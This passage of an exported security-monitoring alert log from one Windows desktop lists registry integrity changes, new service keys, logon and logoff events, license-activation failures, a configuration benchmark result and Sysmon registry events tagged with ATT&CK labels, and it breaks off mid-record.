'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '0ec8c5bab58c4b05da4b48fa2c3bf9b5' +New md5sum is : 'f61272d9ef481aeaeaa355f2d71d77c7' +Old sha1sum was: '453d1c5c9c77e01007afa63ba0bb33db3da2ef96' +New sha1sum is : '42abc0c526e0c7a2d4d9d840fc642e3d0179b728' +", +"Apr 24, 2020 @ 11:02:57.047",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:57.031",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:56.968",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:56.953",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:56.734",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:56.719",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:54.207",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:54.179",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:53.947",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:53.922",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:53.740",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: 'acae9dc748745942263a86d7eb614be0' +New md5sum is : '07bcbe44689b969b45098e345d432277' +Old sha1sum was: '426e630d1ce4b54eb126567e177155a4f7a507fa' +New sha1sum is : '77f62fa77317c4bdd2c675ee6c90a7c8ca01c355' +", +"Apr 24, 2020 @ 11:02:52.353",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.340",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:52.170",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.146",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:52.024",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:52.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:49.423",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:49.407",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\4' was added. +", +"Apr 24, 2020 @ 11:02:49.405",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\3' was added. +", +"Apr 24, 2020 @ 11:02:49.375",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\2' was added. +", +"Apr 24, 2020 @ 11:02:49.368",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\1' was added. +", +"Apr 24, 2020 @ 11:02:49.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\TriggerInfo\0' was added. +", +"Apr 24, 2020 @ 11:02:49.328",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:48.348",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_376ac' was added. +", +"Apr 24, 2020 @ 11:02:48.330",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:48.078",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: 'c6ea3bd2e15bcf416c8f2d61c71010e3' +New md5sum is : '36aaeb790a021755768e5fdf17bd44d7' +Old sha1sum was: '354a2b1d73f9ad4870cd65daf2b8156d72521032' +New sha1sum is : 'ad54ef3d3cca7e4120e57f95847d5e12e3999904' +", +"Apr 24, 2020 @ 11:02:48.063",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '7ad8870899ca2bf54b124825022fe0c6' +New md5sum is : '3f386f86526122f9896850ebf052d0e5' +Old sha1sum was: 'f0e34e29b93cf8d052ac5aea621d98e83c13b488' +New sha1sum is : '893e8a5eed791b28b06ba9456666d04f449facaf' +", +"Apr 24, 2020 @ 11:02:48.015",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'b863e575b2cca664b99a881713f146c2' +New md5sum is : 'dbf977dde384a4270cf8c3dffd90c88b' +Old sha1sum was: '95491db26e7e8c0fbc75daa3bcebc862313c84ff' +New sha1sum is : 'f778224b7c81e918affb793f903099d034c886a5' +", +"Apr 24, 2020 @ 11:02:47.422",3,"Service startup type was changed",,"""The start type of the Windows Modules Installer service was changed from demand start to auto start.""" +"Apr 24, 2020 @ 11:02:45.610",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_376ac' was added. +", +"Apr 24, 2020 @ 11:02:45.594",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_376ac\Security' was added. +", +"Apr 24, 2020 @ 11:02:20.218",3,"Software Protection service scheduled successfully",,"""Successfully scheduled Software Protection service for re-start at 2020-04-25T11:01:17Z. Reason: RulesEngine.""" +"Apr 24, 2020 @ 11:02:14.001",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:49.586",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:40.436",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DC8 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 11:01:40.421",3,"Windows User Logoff",,"""An account was logged off. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DE8 + +Logon Type: 2 + +This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.""" +"Apr 24, 2020 @ 11:01:40.390",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: No + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DE8 + Linked Logon ID: 0xC6DC8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:40.376",3,"Windows Workstation Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 2 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0xC6DC8 + Linked Logon ID: 0xC6DE8 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x3d0 + Process Name: C:\Windows\System32\svchost.exe + +Network Information: + Workstation Name: DESKTOP-HUE026H + Source Network Address: 127.0.0.1 + Source Port: 0 + +Detailed Authentication Information: + Logon Process: User32 + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:27.719",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:24.592",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=TimerEvent""" +"Apr 24, 2020 @ 11:01:24.562",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=NetworkAvailable""" +"Apr 24, 2020 @ 11:01:24.483",5,"License Activation (slui.exe) failed",,"""License Activation (slui.exe) failed with the following error code: +hr=0x803F7001 +Command-line arguments: +RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2b1f36bb-c1cd-4306-bf5c-a0367c2d97d8;NotificationInterval=1440;Trigger=UserLogon;SessionId=1""" +"Apr 24, 2020 @ 11:01:19.376",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)",, +"Apr 24, 2020 @ 11:01:18.546",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 24, 2020 @ 11:01:18.423",3,"Windows Logon Success",,"""An account was successfully logged on. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Logon Information: + Logon Type: 5 + Restricted Admin Mode: - + Virtual Account: No + Elevated Token: Yes + +Impersonation Level: Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x244 + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 24, 2020 @ 11:01:18.343",3,"The database engine attached a database",,"""SearchIndexer (4876,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000013:00C6:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000005 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.011929 -0.011680 (1) WT +J(0) +M(C:0K, Fs:27, WS:40K # 0K, PF:40K # 0K, P:40K) +[3] 0.029535 -0.024821 (5) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:39, WS:120K # 0K, PF:140K # 0K, P:140K) +[4] 0.000112 +J(0) +[5] - +[6] - +[7] - +[8] 0.002042 -0.000587 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:54, WS:212K # 0K, PF:664K # 0K, P:664K) +[9] 0.049637 -0.000126 (5) CM -0.049307 (1) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 132K, P:256K) +[10] 0.000127 -0.000057 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 8K, PF:96K # 96K, P:96K) +[11] 0.000011 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000031 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.0 +J(0) +[14] 0.0 +J(0) +[15] 0.000003 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 24, 2020 @ 11:01:18.266",3,"The database engine is starting a new instance",,"""SearchIndexer (4876,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 24, 2020 @ 11:01:16.298",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 24, 2020 @ 11:01:15.884",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.936877900Z"",""eventRecordID"":""944"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:06.052\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:06.052"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:06.052 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 24, 2020 @ 11:01:15.553",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.810432400Z"",""eventRecordID"":""938"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:15.479",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.810229500Z"",""eventRecordID"":""937"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_376ac\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_376ac\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_376ac\Start +Details: DWORD (0x00000002)""" +"Apr 24, 2020 @ 11:01:15.444",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-24T11:01:07.809446200Z"",""eventRecordID"":""936"",""processID"":""2144"",""threadID"":""3192"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-24 11:01:05.536\r\nProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000}\r\nProcessId: 580\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_376ac\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-24 11:01:05.536"",""processGuid"":""{df9fc3d3-c6e7-5ea2-0000-00102ba80000}"",""processId"":""580"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_376ac\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-24 11:01:05.536 +ProcessGuid: {df9fc3d3-c6e7-5ea2-0000-00102ba80000} +ProcessId: 580 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_376ac\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 24, 2020 @ 11:01:15.415",9,"ATT&CK T1058:Registry edit for new 